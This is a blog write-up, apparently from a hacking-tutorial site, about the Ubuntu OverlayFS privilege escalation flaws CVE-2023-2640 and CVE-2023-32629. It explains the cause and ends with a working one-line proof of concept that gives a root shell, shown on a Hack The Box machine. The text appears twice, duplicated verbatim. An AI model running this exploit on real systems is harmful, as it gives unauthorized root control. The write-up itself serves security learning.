000000000000

000000000000

HOME

/

Hacking Articles

/

GET IN TOUCH

Ubuntu GameOver(lay) Local Privilege Escalation

Sep 11, 2023

Introduction:

Two privilege escalation vulnerabilities, namely CVE-2023-2640 and CVE-2023-32629, have been identified in the Ubuntu kernel OverlayFS module. These vulnerabilities not only affect Ubuntu hosts running vulnerable kernel versions but also impact any containers running on those hosts.

Background: Understanding OverlayFS

OverlayFS is a union mount filesystem that combines two directory trees, with one tree typically being read-write and overlaid on top of another read-only tree. In OverlayFS, any modifications are made to the upper writable layer, while the lower layer remains read-only.

In the context of containers and Kubernetes, OverlayFS plays a crucial role as one of the fundamental building blocks. The lower layer represents the read-only image or base layer, while the upper layer is the container layer that can be modified.

Due to the involvement of the kernel in managing file interactions between the lower and upper layers, OverlayFS becomes an attractive target for exploitation. Several vulnerabilities in OverlayFS have been discovered in the past. If you want to study OverlayFS in depth https://www.grant.pizza/blog/overlayfs/.

Major Impact:

Both of these vulnerabilities allow for local privilege escalation, enabling an unprivileged user to gain elevated privileges on the system. This poses a significant threat as it grants attackers with basic access the ability to escalate their privileges to root level, thereby gaining complete control over the compromised system.

How it Works:

CVE-2023-2640 and CVE-2023-32629 share a common core issue, which involves the copying files from the lower directory to the upper directory while preserving their extended file attributes. Consequently, if a file in the lower directory possesses capabilities such as CAP_SYS_ADMIN or CAP_SETUID, these capabilities are retained in the upper layer. As a result, a non-root user can simply execute the file in the upper layer to acquire root privileges and accomplish privilege escalation.

POC:

Payload

I have used Hack The Box machine "Analytics" for practical demonstration of Ubuntu GameOver(Lay) vulnerability.

User "metalytics" is unprivilieged user. Executing following payload will change user to its "root" user.

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

HOME

/

Hacking Articles

/

GET IN TOUCH

Ubuntu GameOver(lay) Local Privilege Escalation

Sep 11, 2023

Introduction:

Two privilege escalation vulnerabilities, namely CVE-2023-2640 and CVE-2023-32629, have been identified in the Ubuntu kernel OverlayFS module. These vulnerabilities not only affect Ubuntu hosts running vulnerable kernel versions but also impact any containers running on those hosts.

Background: Understanding OverlayFS

OverlayFS is a union mount filesystem that combines two directory trees, with one tree typically being read-write and overlaid on top of another read-only tree. In OverlayFS, any modifications are made to the upper writable layer, while the lower layer remains read-only.

In the context of containers and Kubernetes, OverlayFS plays a crucial role as one of the fundamental building blocks. The lower layer represents the read-only image or base layer, while the upper layer is the container layer that can be modified.

Due to the involvement of the kernel in managing file interactions between the lower and upper layers, OverlayFS becomes an attractive target for exploitation. Several vulnerabilities in OverlayFS have been discovered in the past. If you want to study OverlayFS in depth https://www.grant.pizza/blog/overlayfs/.

Major Impact:

Both of these vulnerabilities allow for local privilege escalation, enabling an unprivileged user to gain elevated privileges on the system. This poses a significant threat as it grants attackers with basic access the ability to escalate their privileges to root level, thereby gaining complete control over the compromised system.

How it Works:

CVE-2023-2640 and CVE-2023-32629 share a common core issue, which involves the copying files from the lower directory to the upper directory while preserving their extended file attributes. Consequently, if a file in the lower directory possesses capabilities such as CAP_SYS_ADMIN or CAP_SETUID, these capabilities are retained in the upper layer. As a result, a non-root user can simply execute the file in the upper layer to acquire root privileges and accomplish privilege escalation.

POC:

Payload

I have used Hack The Box machine "Analytics" for practical demonstration of Ubuntu GameOver(Lay) vulnerability.

User "metalytics" is unprivilieged user. Executing following payload will change user to its "root" user.

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'